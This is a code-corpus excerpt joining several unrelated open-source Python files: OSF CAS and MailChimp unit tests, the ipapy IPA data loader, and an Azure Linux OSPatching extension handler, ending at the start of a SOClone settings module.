service_url = 'http://test.osf.io'
ticket = fake.md5()
body = make_service_validation_response_body(user, ticket)
responses.add(
responses.Response(
responses.GET,
url.url,
body=body,
status=200,
)
)
resp = self.client.service_validate(ticket, service_url)
assert_true(resp.authenticated)
@responses.activate
def test_service_validate_invalid_ticket_raises_error(self):
url = furl.furl(self.base_url)
url.path.segments.extend(('p3', 'serviceValidate',))
service_url = 'http://test.osf.io'
# Return error response
responses.add(
responses.Response(
responses.GET,
url.url,
body='invalid ticket...',
status=500,
)
)
with assert_raises(cas.CasHTTPError):
self.client.service_validate('invalid', service_url)
@responses.activate
def test_profile_invalid_access_token_raises_error(self):
url = furl.furl(self.base_url)
url.path.segments.extend(('oauth2', 'profile',))
responses.add(
responses.Response(
responses.GET,
url.url,
status=500,
)
)
with assert_raises(cas.CasHTTPError):
self.client.profile('invalid-access-token')
@responses.activate
def test_application_token_revocation_succeeds(self):
url = self.client.get_auth_token_revocation_url()
client_id= 'fake_id'
client_secret = 'fake_secret'
responses.add(
responses.Response(
responses.POST,
url,
body={'client_id': client_id,
'client_secret': client_secret},
status=204
)
)
res = self.client.revoke_application_tokens(client_id, client_secret)
assert_equal(res, True)
@responses.activate
def test_application_token_revocation_fails(self):
url = self.client.get_auth_token_revocation_url()
client_id= 'fake_id'
client_secret = 'fake_secret'
responses.add(
responses.Response(
responses.POST,
url,
body={'client_id': client_id,
'client_secret': client_secret},
status=400
)
)
with assert_raises(cas.CasHTTPError):
res = self.client.revoke_application_tokens(client_id, client_secret)
@unittest.skip('finish me')
def test_profile_valid_access_token_returns_cas_response(self):
assert 0
@unittest.skip('finish me')
def test_get_login_url(self):
assert 0
@unittest.skip('finish me')
def test_get_logout_url(self):
assert 0
class TestCASTicketAuthentication(OsfTestCase):
def setUp(self):
OsfTestCase.setUp(self)
self.user = UserFactory()
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_success(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_service_validate.return_value = make_successful_response(self.user)
mock_get_user_from_cas_resp.return_value = (self.user, None, 'authenticate')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
assert_equal(mock_get_user_from_cas_resp.call_count, 1)
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_failure(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_service_validate.return_value = make_failure_response()
mock_get_user_from_cas_resp.return_value = (None, None, None)
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
assert_equal(mock_get_user_from_cas_resp.call_count, 0)
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_invalidates_verification_key(self, mock_service_validate):
self.user.verification_key = fake.md5()
self.user.save()
mock_service_validate.return_value = make_successful_response(self.user)
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
self.user.reload()
assert_true(self.user.verification_key is None)
class TestCASExternalLogin(OsfTestCase):
def setUp(self):
super(TestCASExternalLogin, self).setUp()
self.user = UserFactory()
def test_get_user_from_cas_resp_already_authorized(self):
mock_response = make_external_response()
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
user, external_credential, action = cas.get_user_from_cas_resp(mock_response)
assert_equal(user._id, self.user._id)
assert_equal(external_credential, validated_creds)
assert_equal(action, 'authenticate')
def test_get_user_from_cas_resp_not_authorized(self):
user, external_credential, action = cas.get_user_from_cas_resp(make_external_response())
assert_equal(user, None)
assert_true(external_credential is not None)
assert_equal(action, 'external_first_login')
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_with_user(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
mock_get_user_from_cas_resp.return_value = (self.user, validated_creds, 'authenticate')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(mock_service_validate.call_count, 1)
assert_true(mock_get_user_from_cas_resp.call_count, 1)
assert_equal(resp.status_code, 302)
assert_in('/logout?service=', resp.headers['Location'])
assert_in('/login?service=', resp.headers['Location'])
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_no_user(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
validated_creds = cas.validate_external_credential(mock_response.user)
mock_get_user_from_cas_resp.return_value = (None, validated_creds, 'external_first_login')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(mock_service_validate.call_count, 1)
assert_true(mock_get_user_from_cas_resp.call_count, 1)
assert_equal(resp.status_code, 302)
assert_equal(resp.location, '/external-login/email')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_generates_new_verification_key(self, mock_service_validate):
self.user.verification_key = fake.md5()
self.user.save()
mock_response = make_external_response()
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
verification_key = self.user.verification_key
resp = cas.make_response_from_ticket(ticket, service_url)
self.user.reload()
assert_not_equal(self.user.verification_key, verification_key)
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_handles_unicode(self, mock_service_validate):
mock_response = make_external_response(unicode=True)
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
first_call_args = mock_service_validate.call_args[0]
assert_equal(first_call_args[0], ticket)
assert_equal(first_call_args[1], 'http://localhost:5000/')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_handles_non_unicode(self, mock_service_validate):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
first_call_args = mock_service_validate.call_args[0]
assert_equal(first_call_args[0], ticket)
assert_equal(first_call_args[1], 'http://localhost:5000/')
| apache-2.0 | 7,033,508,628,497,800,000 | 37.792453 | 117 | 0.627501 | false |
pettarin/ipapy | ipapy/data/__init__.py | 1 | 8249 | #!/usr/bin/env python
# coding=utf-8
"""
ipapy contains data and functions to work with IPA strings.
This module defines data constants and it loads the built-in IPA database.
"""
from __future__ import absolute_import
from __future__ import print_function
import io
import re
import os
from ipapy.compatibility import hex_to_unichr
from ipapy.ipachar import IPAConsonant
from ipapy.ipachar import IPAVowel
from ipapy.ipachar import IPADiacritic
from ipapy.ipachar import IPASuprasegmental
from ipapy.ipachar import IPATone
__author__ = "Alberto Pettarin"
__copyright__ = "Copyright 2016-2019, Alberto Pettarin (www.albertopettarin.it)"
__license__ = "MIT"
__email__ = "[email protected]"
DATA_FILE_CODEPOINT_JOINER = u"_"
"""
Character to specify Unicode compound strings,
e.g. 0070_032A or U+0070_U+032A = LATIN SMALL LETTER P + COMBINING BRIDGE BELOW
"""
DATA_FILE_CODEPOINT_SEPARATOR = u" "
"""
Separator between Unicode codepoints or
Unicode compound strings for a given IPAChar
"""
DATA_FILE_COMMENT = u"#"
""" Ignore lines starting with this character """
DATA_FILE_FIELD_SEPARATOR = u","
""" Field separator for the data file """
DATA_FILE_VALUE_NOT_AVAILABLE = u"N/A"
""" Placeholder for an IPAChar not encoded in Unicode """
DATA_FILE_ASCII_NUMERICAL_CODEPOINT_START = u"00"
""" Numerical codepoints in ASCII fields must start with this string """
DATA_FILE_ASCII_UNICODE_CODEPOINT_START = u"U+"
""" Unicode codepoints in ASCII fields must start with this string """
def convert_unicode_field(string):
"""
Convert a Unicode field into the corresponding list of Unicode strings.
The (input) Unicode field is a Unicode string containing
one or more Unicode codepoints (``xxxx`` or ``U+xxxx`` or ``xxxx_yyyy``),
separated by a space.
:param str string: the (input) Unicode field
:rtype: list of Unicode strings
"""
values = []
for codepoint in [s for s in string.split(DATA_FILE_CODEPOINT_SEPARATOR) if (s != DATA_FILE_VALUE_NOT_AVAILABLE) and (len(s) > 0)]:
values.append(u"".join([hex_to_unichr(c) for c in codepoint.split(DATA_FILE_CODEPOINT_JOINER)]))
return values
def convert_ascii_field(string):
"""
Convert an ASCII field into the corresponding list of Unicode strings.
The (input) ASCII field is a Unicode string containing
one or more ASCII codepoints (``00xx`` or ``U+00xx`` or
an ASCII string not starting with ``00`` or ``U+``),
separated by a space.
:param str string: the (input) ASCII field
:rtype: list of Unicode strings
"""
values = []
for codepoint in [s for s in string.split(DATA_FILE_CODEPOINT_SEPARATOR) if (s != DATA_FILE_VALUE_NOT_AVAILABLE) and (len(s) > 0)]:
#if DATA_FILE_CODEPOINT_JOINER in codepoint:
# values.append(u"".join([hex_to_unichr(c) for c in codepoint.split(DATA_FILE_CODEPOINT_JOINER)]))
if (codepoint.startswith(DATA_FILE_ASCII_NUMERICAL_CODEPOINT_START)) or (codepoint.startswith(DATA_FILE_ASCII_UNICODE_CODEPOINT_START)):
values.append(hex_to_unichr(codepoint))
else:
values.append(codepoint)
return values
def convert_raw_tuple(value_tuple, format_string):
"""
Convert a tuple of raw values, according to the given line format.
:param tuple value_tuple: the tuple of raw values
:param str format_string: the format of the tuple
:rtype: list of tuples
"""
values = []
for v, c in zip(value_tuple, format_string):
if v is None:
# append None
values.append(v)
elif c == u"s":
# string
values.append(v)
elif c == u"S":
# string, split using space as delimiter
values.append([s for s in v.split(u" ") if len(s) > 0])
elif c == u"i":
# int
values.append(int(v))
elif c == u"U":
# Unicode
values.append(convert_unicode_field(v))
elif c == u"A":
# ASCII
values.append(convert_ascii_field(v))
#elif c == u"x":
# # ignore
# pass
return tuple(values)
def load_data_file(
file_path,
file_path_is_relative=False,
comment_string=DATA_FILE_COMMENT,
field_separator=DATA_FILE_FIELD_SEPARATOR,
line_format=None
):
"""
Load a data file, with one record per line and
fields separated by ``field_separator``,
returning a list of tuples.
It ignores lines starting with ``comment_string`` or empty lines.
If ``values_per_line`` is not ``None``,
check that each line (tuple)
has the prescribed number of values.
:param str file_path: path of the data file to load
:param bool file_path_is_relative: if ``True``, ``file_path`` is relative to this source code file
:param str comment_string: ignore lines starting with this string
:param str field_separator: fields are separated by this string
:param str line_format: if not ``None``, parses each line according to the given format
(``s`` = string, ``S`` = split string using spaces,
``i`` = int, ``x`` = ignore, ``U`` = Unicode, ``A`` = ASCII)
:rtype: list of tuples
"""
raw_tuples = []
if file_path_is_relative:
file_path = os.path.join(os.path.dirname(__file__), file_path)
with io.open(file_path, "r", encoding="utf-8") as f:
for line in f:
line = line.strip()
if (len(line) > 0) and (not line.startswith(comment_string)):
raw_list = line.split(field_separator)
if len(raw_list) != len(line_format):
raise ValueError("Data file '%s' contains a bad line: '%s'" % (file_path, line))
raw_tuples.append(tuple(raw_list))
if (line_format is None) or (len(line_format) < 1):
return raw_tuples
return [convert_raw_tuple(t, line_format) for t in raw_tuples]
def load_ipa_data():
"""
Load the IPA data from the built-in IPA database, creating the following globals:
1. ``IPA_CHARS``: list of all IPAChar objects
2. ``UNICODE_TO_IPA``: dict mapping a Unicode string (often, a single char) to an IPAChar
3. ``UNICODE_TO_IPA_MAX_KEY_LENGTH``: length of a longest key in ``UNICODE_TO_IPA``
4. ``IPA_TO_UNICODE``: map an IPAChar canonical representation to the corresponding Unicode string (or char)
"""
ipa_signs = []
unicode_to_ipa = {}
ipa_to_unicode = {}
max_key_length = 0
for line in load_data_file(
file_path=u"ipa.dat",
file_path_is_relative=True,
line_format=u"sU"
):
# unpack data
i_desc, i_unicode_keys = line
name = re.sub(r" [ ]*", " ", i_desc)
# create a suitable IPACharacter obj
if u"consonant" in i_desc:
obj = IPAConsonant(name=name, descriptors=i_desc)
elif u"vowel" in i_desc:
obj = IPAVowel(name=name, descriptors=i_desc)
elif u"diacritic" in i_desc:
obj = IPADiacritic(name=name, descriptors=i_desc)
elif u"suprasegmental" in i_desc:
obj = IPASuprasegmental(name=name, descriptors=i_desc)
elif u"tone" in i_desc:
obj = IPATone(name=name, descriptors=i_desc)
else:
raise ValueError("The IPA data file contains a bad line, defining an unknown type: '%s'" % (line))
ipa_signs.append(obj)
# map Unicode codepoint to object, if the former is available
if len(i_unicode_keys) > 0:
# canonical Unicode string
first_key = i_unicode_keys[0]
ipa_to_unicode[obj.canonical_representation] = first_key
obj.unicode_repr = first_key
max_key_length = max(max_key_length, len(first_key))
# add all Unicode strings
for key in i_unicode_keys:
if key in unicode_to_ipa:
raise ValueError("The IPA data file contains a bad line, redefining codepoint '%s': '%s'" % (key, line))
unicode_to_ipa[key] = obj
return ipa_signs, unicode_to_ipa, max_key_length, ipa_to_unicode
IPA_CHARS, UNICODE_TO_IPA, UNICODE_TO_IPA_MAX_KEY_LENGTH, IPA_TO_UNICODE = load_ipa_data()
| mit | 2,773,272,724,314,759,700 | 36.325792 | 144 | 0.630864 | false |
MerlinZhang/osf.io | tests/test_mailchimp.py | 16 | 3743 | # -*- coding: utf-8 -*-
import mock
from website import mailchimp_utils
from tests.base import OsfTestCase
from nose.tools import * # noqa; PEP8 asserts
from tests.factories import UserFactory
import mailchimp
from framework.tasks import handlers
class TestMailChimpHelpers(OsfTestCase):
def setUp(self, *args, **kwargs):
super(TestMailChimpHelpers, self).setUp(*args, **kwargs)
with self.context:
handlers.celery_before_request()
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_get_list_id_from_name(self, mock_get_mailchimp_api):
list_name = 'foo'
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': 1, 'list_name': list_name}]}
list_id = mailchimp_utils.get_list_id_from_name(list_name)
mock_client.lists.list.assert_called_with(filters={'list_name': list_name})
assert_equal(list_id, 1)
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_get_list_name_from_id(self, mock_get_mailchimp_api):
list_id = '12345'
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': list_id, 'name': 'foo'}]}
list_name = mailchimp_utils.get_list_name_from_id(list_id)
mock_client.lists.list.assert_called_with(filters={'list_id': list_id})
assert_equal(list_name, 'foo')
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_subscribe_called_with_correct_arguments(self, mock_get_mailchimp_api):
list_name = 'foo'
user = UserFactory()
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': 1, 'list_name': list_name}]}
list_id = mailchimp_utils.get_list_id_from_name(list_name)
mailchimp_utils.subscribe_mailchimp(list_name, user._id)
handlers.celery_teardown_request()
mock_client.lists.subscribe.assert_called_with(
id=list_id,
email={'email': user.username},
merge_vars={
'fname': user.given_name,
'lname': user.family_name,
},
double_optin=False,
update_existing=True,
)
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_subscribe_fake_email_does_not_throw_validation_error(self, mock_get_mailchimp_api):
list_name = 'foo'
user = UserFactory(username='[email protected]')
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': 1, 'list_name': list_name}]}
mock_client.lists.subscribe.side_effect = mailchimp.ValidationError
mailchimp_utils.subscribe_mailchimp(list_name, user._id)
handlers.celery_teardown_request()
assert_false(user.mailing_lists[list_name])
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_unsubscribe_called_with_correct_arguments(self, mock_get_mailchimp_api):
list_name = 'foo'
user = UserFactory()
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': 2, 'list_name': list_name}]}
list_id = mailchimp_utils.get_list_id_from_name(list_name)
mailchimp_utils.unsubscribe_mailchimp(list_name, user._id)
handlers.celery_teardown_request()
mock_client.lists.unsubscribe.assert_called_with(id=list_id, email={'email': user.username})
| apache-2.0 | 3,636,353,774,546,548,000 | 45.209877 | 100 | 0.650815 | false |
Azure/azure-linux-extensions | OSPatching/handler.py | 5 | 17340 | #!/usr/bin/python
#
# OSPatching extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+
import os
import sys
import re
import time
import json
import tempfile
import urllib2
import urlparse
import platform
import shutil
import traceback
import logging
from azure.storage import BlobService
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as Util
from patch import *
# Global variables definition
ExtensionShortName = "DSCForLinux"
DownloadDirectory = 'download'
idleTestScriptName = "idleTest.py"
healthyTestScriptName = "healthyTest.py"
def install():
hutil.do_parse_context('Install')
try:
MyPatching.install()
hutil.do_exit(0, 'Install', 'success', '0', 'Install Succeeded.')
except Exception, e:
hutil.error("Failed to install the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Install', 'error', '0', 'Install Failed.')
def enable():
hutil.log("WARNING: The OSPatching extension for Linux has been deprecated. "
"Please see the GitHub project "
"(https://github.com/Azure/azure-linux-extensions/tree/master/OSPatching) "
"for more information.")
hutil.do_parse_context('Enable')
try:
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
MyPatching.parse_settings(settings)
# Ensure the same configuration is executed only once
hutil.exit_if_seq_smaller()
oneoff = settings.get("oneoff")
download_customized_vmstatustest()
copy_vmstatustestscript(hutil.get_seq_no(), oneoff)
MyPatching.enable()
current_config = MyPatching.get_current_config()
hutil.do_exit(0, 'Enable', 'warning', '0', 'Enable Succeeded. OSPatching is deprecated. See https://github.com/Azure/azure-linux-extensions/tree/master/OSPatching for more info. Current Configuration: ' + current_config)
except Exception, e:
current_config = MyPatching.get_current_config()
hutil.error("Failed to enable the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Enable', 'error', '0', 'Enable Failed. Current Configuation: ' + current_config)
def uninstall():
hutil.do_parse_context('Uninstall')
hutil.do_exit(0, 'Uninstall', 'success', '0', 'Uninstall Succeeded.')
def disable():
hutil.do_parse_context('Disable')
try:
MyPatching.disable()
hutil.do_exit(0, 'Disable', 'success', '0', 'Disable Succeeded.')
except Exception, e:
hutil.error("Failed to disable the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Disable', 'error', '0', 'Disable Failed.')
def update():
hutil.do_parse_context('Upadate')
hutil.do_exit(0, 'Update', 'success', '0', 'Update Succeeded.')
def download():
hutil.do_parse_context('Download')
try:
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
MyPatching.parse_settings(settings)
MyPatching.download()
current_config = MyPatching.get_current_config()
hutil.do_exit(0,'Enable','success','0', 'Download Succeeded. Current Configuation: ' + current_config)
except Exception, e:
current_config = MyPatching.get_current_config()
hutil.error("Failed to download updates with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Enable','error','0', 'Download Failed. Current Configuation: ' + current_config)
def patch():
hutil.do_parse_context('Patch')
try:
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
MyPatching.parse_settings(settings)
MyPatching.patch()
current_config = MyPatching.get_current_config()
hutil.do_exit(0,'Enable','success','0', 'Patch Succeeded. Current Configuation: ' + current_config)
except Exception, e:
current_config = MyPatching.get_current_config()
hutil.error("Failed to patch with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Enable','error','0', 'Patch Failed. Current Configuation: ' + current_config)
def oneoff():
hutil.do_parse_context('Oneoff')
try:
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
MyPatching.parse_settings(settings)
MyPatching.patch_one_off()
current_config = MyPatching.get_current_config()
hutil.do_exit(0,'Enable','success','0', 'Oneoff Patch Succeeded. Current Configuation: ' + current_config)
except Exception, e:
current_config = MyPatching.get_current_config()
hutil.error("Failed to one-off patch with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Enable','error','0', 'Oneoff Patch Failed. Current Configuation: ' + current_config)
def download_files(hutil):
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
local = settings.get("vmStatusTest", dict()).get("local", "")
if str(local).lower() == "true":
local = True
elif str(local).lower() == "false":
local = False
else:
hutil.log("WARNING: The parameter \"local\" "
"is empty or invalid. Set it as False. Continue...")
local = False
idle_test_script = settings.get("vmStatusTest", dict()).get('idleTestScript')
healthy_test_script = settings.get("vmStatusTest", dict()).get('healthyTestScript')
if (not idle_test_script and not healthy_test_script):
hutil.log("WARNING: The parameter \"idleTestScript\" and \"healthyTestScript\" "
"are both empty. Exit downloading VMStatusTest scripts...")
return
elif local:
if (idle_test_script and idle_test_script.startswith("http")) or \
(healthy_test_script and healthy_test_script.startswith("http")):
hutil.log("WARNING: The parameter \"idleTestScript\" or \"healthyTestScript\" "
"should not be uri. Exit downloading VMStatusTest scripts...")
return
elif not local:
if (idle_test_script and not idle_test_script.startswith("http")) or \
(healthy_test_script and not healthy_test_script.startswith("http")):
hutil.log("WARNING: The parameter \"idleTestScript\" or \"healthyTestScript\" "
"should be uri. Exit downloading VMStatusTest scripts...")
return
hutil.do_status_report('Downloading','transitioning', '0',
'Downloading VMStatusTest scripts...')
vmStatusTestScripts = dict()
vmStatusTestScripts[idle_test_script] = idleTestScriptName
vmStatusTestScripts[healthy_test_script] = healthyTestScriptName
if local:
hutil.log("Saving VMStatusTest scripts from user's configurations...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = save_local_file(src, dst, hutil)
preprocess_files(file_path, hutil)
return
storage_account_name = None
storage_account_key = None
if settings:
storage_account_name = settings.get("storageAccountName", "").strip()
storage_account_key = settings.get("storageAccountKey", "").strip()
if storage_account_name and storage_account_key:
hutil.log("Downloading VMStatusTest scripts from azure storage...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = download_blob(storage_account_name,
storage_account_key,
src,
dst,
hutil)
preprocess_files(file_path, hutil)
elif not(storage_account_name or storage_account_key):
hutil.log("No azure storage account and key specified in protected "
"settings. Downloading VMStatusTest scripts from external links...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = download_external_file(src, dst, hutil)
preprocess_files(file_path, hutil)
else:
#Storage account and key should appear in pairs
error_msg = "Azure storage account or storage key is not provided"
hutil.error(error_msg)
raise ValueError(error_msg)
def download_blob(storage_account_name, storage_account_key,
blob_uri, dst, hutil):
seqNo = hutil.get_seq_no()
container_name = get_container_name_from_uri(blob_uri)
blob_name = get_blob_name_from_uri(blob_uri)
download_dir = prepare_download_dir(seqNo)
download_path = os.path.join(download_dir, dst)
#Guest agent already ensure the plugin is enabled one after another.
#The blob download will not conflict.
blob_service = BlobService(storage_account_name, storage_account_key)
try:
hutil.log("Downloading to {0}".format(download_path))
blob_service.get_blob_to_path(container_name, blob_name, download_path)
except Exception, e:
hutil.error(("Failed to download blob with uri:{0} "
"with error {1}").format(blob_uri,e))
raise
return download_path
def download_external_file(uri, dst, hutil):
seqNo = hutil.get_seq_no()
download_dir = prepare_download_dir(seqNo)
file_path = os.path.join(download_dir, dst)
try:
hutil.log("Downloading to {0}".format(file_path))
download_and_save_file(uri, file_path)
except Exception, e:
hutil.error(("Failed to download external file with uri:{0} "
"with error {1}").format(uri, e))
raise
return file_path
def save_local_file(src, dst, hutil):
seqNo = hutil.get_seq_no()
download_dir = prepare_download_dir(seqNo)
file_path = os.path.join(download_dir, dst)
try:
hutil.log("Downloading to {0}".format(file_path))
waagent.SetFileContents(file_path, src)
except Exception, e:
hutil.error(("Failed to save file from user's configuration "
"with error {0}").format(e))
raise
return file_path
def preprocess_files(file_path, hutil):
"""
Preprocess the text file. If it is a binary file, skip it.
"""
is_text, code_type = is_text_file(file_path)
if is_text:
dos2unix(file_path)
hutil.log("Converting text files from DOS to Unix formats: Done")
if code_type in ['UTF-8', 'UTF-16LE', 'UTF-16BE']:
remove_bom(file_path)
hutil.log("Removing BOM: Done")
def is_text_file(file_path):
with open(file_path, 'rb') as f:
contents = f.read(512)
return is_text(contents)
def is_text(contents):
supported_encoding = ['ascii', 'UTF-8', 'UTF-16LE', 'UTF-16BE']
# Openlogic and Oracle distros don't have python-chardet
waagent.Run('yum -y install python-chardet', False)
import chardet
code_type = chardet.detect(contents)['encoding']
if code_type in supported_encoding:
return True, code_type
else:
return False, code_type
def dos2unix(file_path):
temp_file_path = tempfile.mkstemp()[1]
f_temp = open(temp_file_path, 'wb')
with open(file_path, 'rU') as f:
contents = f.read()
f_temp.write(contents)
f_temp.close()
shutil.move(temp_file_path, file_path)
def remove_bom(file_path):
temp_file_path = tempfile.mkstemp()[1]
f_temp = open(temp_file_path, 'wb')
with open(file_path, 'rb') as f:
contents = f.read()
for encoding in ["utf-8-sig", "utf-16"]:
try:
f_temp.write(contents.decode(encoding).encode('utf-8'))
break
except UnicodeDecodeError:
continue
f_temp.close()
shutil.move(temp_file_path, file_path)
def download_and_save_file(uri, file_path):
src = urllib2.urlopen(uri)
dest = open(file_path, 'wb')
buf_size = 1024
buf = src.read(buf_size)
while(buf):
dest.write(buf)
buf = src.read(buf_size)
def prepare_download_dir(seqNo):
download_dir_main = os.path.join(os.getcwd(), DownloadDirectory)
create_directory_if_not_exists(download_dir_main)
download_dir = os.path.join(download_dir_main, seqNo)
create_directory_if_not_exists(download_dir)
return download_dir
def create_directory_if_not_exists(directory):
"""create directory if no exists"""
if not os.path.exists(directory):
os.makedirs(directory)
def get_path_from_uri(uriStr):
uri = urlparse.urlparse(uriStr)
return uri.path
def get_blob_name_from_uri(uri):
return get_properties_from_uri(uri)['blob_name']
def get_container_name_from_uri(uri):
return get_properties_from_uri(uri)['container_name']
def get_properties_from_uri(uri):
path = get_path_from_uri(uri)
if path.endswith('/'):
path = path[:-1]
if path[0] == '/':
path = path[1:]
first_sep = path.find('/')
if first_sep == -1:
hutil.error("Failed to extract container, blob, from {}".format(path))
blob_name = path[first_sep+1:]
container_name = path[:first_sep]
return {'blob_name': blob_name, 'container_name': container_name}
def download_customized_vmstatustest():
download_dir = prepare_download_dir(hutil.get_seq_no())
maxRetry = 2
for retry in range(0, maxRetry + 1):
try:
download_files(hutil)
break
except Exception, e:
hutil.error("Failed to download files, retry=" + str(retry) + ", maxRetry=" + str(maxRetry))
if retry != maxRetry:
hutil.log("Sleep 10 seconds")
time.sleep(10)
else:
raise
def copy_vmstatustestscript(seqNo, oneoff):
src_dir = prepare_download_dir(seqNo)
for filename in (idleTestScriptName, healthyTestScriptName):
src = os.path.join(src_dir, filename)
if oneoff is not None and str(oneoff).lower() == "true":
dst = "oneoff"
else:
dst = "scheduled"
dst = os.path.join(os.getcwd(), dst)
current_vmstatustestscript = os.path.join(dst, filename)
if os.path.isfile(current_vmstatustestscript):
os.remove(current_vmstatustestscript)
# Remove the .pyc file
if os.path.isfile(current_vmstatustestscript+'c'):
os.remove(current_vmstatustestscript+'c')
if os.path.isfile(src):
shutil.copy(src, dst)
# Main function is the only entrance to this extension handler
def main():
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout')
waagent.Log("%s started to handle." %(ExtensionShortName))
global hutil
hutil = Util.HandlerUtility(waagent.Log, waagent.Error)
global MyPatching
MyPatching = GetMyPatching(hutil)
if MyPatching is None:
sys.exit(1)
for a in sys.argv[1:]:
if re.match("^([-/]*)(disable)", a):
disable()
elif re.match("^([-/]*)(uninstall)", a):
uninstall()
elif re.match("^([-/]*)(install)", a):
install()
elif re.match("^([-/]*)(enable)", a):
enable()
elif re.match("^([-/]*)(update)", a):
update()
elif re.match("^([-/]*)(download)", a):
download()
elif re.match("^([-/]*)(patch)", a):
patch()
elif re.match("^([-/]*)(oneoff)", a):
oneoff()
if __name__ == '__main__':
main()
| apache-2.0 | -6,010,134,014,404,228,000 | 37.362832 | 228 | 0.627047 | false |
outvader/soclone | soclone/settings.py | 4 | 3026 | """SOClone settings.
A ``local_settings`` module must be made available to define sensitive
and highly installation-specific settings.
The following is a template for the settings which should be provided by
the ``local_settings`` module::
# Database settings
